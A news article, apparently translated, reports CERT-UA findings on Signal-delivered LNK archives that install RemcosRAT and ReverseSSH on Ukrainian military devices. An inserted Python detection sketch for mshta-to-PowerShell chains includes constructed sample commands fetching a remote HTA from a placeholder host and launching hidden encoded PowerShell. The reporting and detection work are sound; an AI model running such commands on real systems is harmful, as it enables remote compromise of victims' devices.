
They posed as the IDF (Tsahal) and the 3rd Separate Assault Brigade: hackers attacked Ukrainian military personnel via Signal

During the cyberattack, the criminals distributed archives containing LNK files, which launched the malicious programs RemcosRAT and ReverseSSH to gain unauthorized access to devices. CERT-UA, the Ukrainian government's computer emergency response team, reported a series of cyberattacks aimed at the Ukrainian military through the Signal messenger. The information appeared on the organization's official website.

According to the response team, at the end of December it received information from cybersecurity experts at Trend Micro about the detection of suspicious files. As a result, a series of cyberattacks against personnel of the Armed Forces of Ukraine was discovered, carried out under the guise of recruiting for the 3rd Separate Assault Brigade and the Israel Defense Forces (Tsahal). The attacks were conducted in the Signal messenger, where archives containing LNK files were distributed.

These files trigger an infection chain that ends with the malicious programs RemcosRAT and ReverseSSH, giving the attackers the means for unauthorized remote access to the victims' devices. The shortcut (LNK) files contained obfuscated commands for downloading and launching an HTA file, which held obfuscated code that launched a PowerShell command to decrypt, decompress and run a malicious PowerShell script. This script, in turn, downloaded and launched the malware files and a decoy document.
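To make the HTA-to-PowerShell step of this chain concrete from a defender's side, here is an added detection sketch (not from CERT-UA or the original article) that looks for `powershell.exe` spawned directly by `mshta.exe` when `mshta.exe` was started with a URL argument. It assumes Sysmon-style process-creation fields and that the HTA is run by `mshta.exe` from a URL; all events, hosts, PIDs and the `example.invalid` address are constructed.

```python
import re
from collections import namedtuple

# Constructed process-creation records (Sysmon Event ID 1 style fields); hosts,
# PIDs, file names and the example.invalid URL are made up for illustration.
Event = namedtuple("Event", "host pid ppid image cmdline")
SAMPLE = [
    Event("ws-01", 4100, 3000, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event("ws-01", 4200, 4100, r"C:\Windows\System32\cmd.exe",
          "cmd.exe /c start mshta.exe https://example.invalid/form.hta"),
    Event("ws-01", 4300, 4200, r"C:\Windows\System32\mshta.exe",
          "mshta.exe https://example.invalid/form.hta"),
    Event("ws-01", 4400, 4300,
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -w hidden -enc <constructed-blob>"),
    Event("ws-02", 5100, 5000, r"C:\Windows\System32\mshta.exe",
          r"mshta.exe C:\Tools\inventory.hta"),  # local HTA, no PowerShell child
    Event("ws-02", 5200, 5000,
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -File backup.ps1"),    # admin script, not under mshta
]

REMOTE_HTA = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    """Lower-cased executable name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_hta_powershell_chains(events):
    """Return (host, mshta_pid, powershell_pid) where mshta.exe was started
    with a URL argument and then spawned powershell.exe directly."""
    by_key = {(e.host, e.pid): e for e in events}
    hits = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_key.get((e.host, e.ppid))
        if parent is None or basename(parent.image) != "mshta.exe":
            continue
        if REMOTE_HTA.search(parent.cmdline):
            hits.append((e.host, parent.pid, e.pid))
    return hits

if __name__ == "__main__":
    for host, mshta_pid, ps_pid in find_hta_powershell_chains(SAMPLE):
        print(f"ALERT host={host} mshta pid={mshta_pid} -> powershell pid={ps_pid}")
```

On real telemetry, key the parent lookup on a unique process identifier (such as Sysmon's ProcessGuid) rather than the PID, since PIDs are reused over time.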

CERT-UA experts noted that the names and content of these documents were highly relevant to the military. It is not yet known who is behind this series of cyberattacks, but the incident underscored the importance of ensuring the cybersecurity of Ukrainian military personnel, representatives of the government team noted. Note that Signal is a free and open-source client for instant messaging and internet telephony. Its development focuses primarily on privacy and security.

Until November 2015, the application was called TextSecure and allowed users to exchange instant messages. As a reminder, in early September we wrote that hackers were breaking into Ukrainians' smartphones through fake Telegram and Signal apps. The applications even appeared in the official Google Play Store. The malicious software has recently been removed from there, but it still poses a danger.